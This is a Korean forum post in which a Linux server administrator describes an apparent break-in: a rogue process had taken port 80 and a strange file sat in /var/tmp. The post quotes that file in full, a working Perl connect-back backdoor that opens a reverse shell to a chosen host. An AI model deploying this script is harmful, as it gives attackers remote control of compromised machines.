크랙당한듯 한데.....

저는, 윈도우를 사용하면서 바이러스나 웜 같은 경우는 그냥 그러려니 하면서 정 못견딜 정도 되면 포맷하고 다시 설치해서 씁니다.

리눅스의 경우는 뭔가 발견하면 그냥 사용하기가 굉장히 꺼림직해집니다. 그렇다고 어떻게 당했는지 찾을 실력은 안되는 경우가 많고... 심증은 있고...

오늘 웹서버를 재시작했는데 실행이 안되서 살펴보니까, 80번 포트를 이상한 프로세서가 사용하고 있더라구요.
그래서 응급조치(이상한 프로세서 죽이고 그 프로그램 찾아서 지움)하고 천천히 살펴보던중 /var/tmp에 첨보는 화일이...

여러분의 시스템은 크랙을 자주 당합니까? 다시 말하면 안전합니까?

뭐 질문이 아니라서 그냥 자유게시판에 올려봅니다...

참, 참고로 이상한 화일의 내용은 아래와 같더군요. 백도어에 연결하는 프로그램인듯한데, 역시 펄과 친하지 않아서...

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";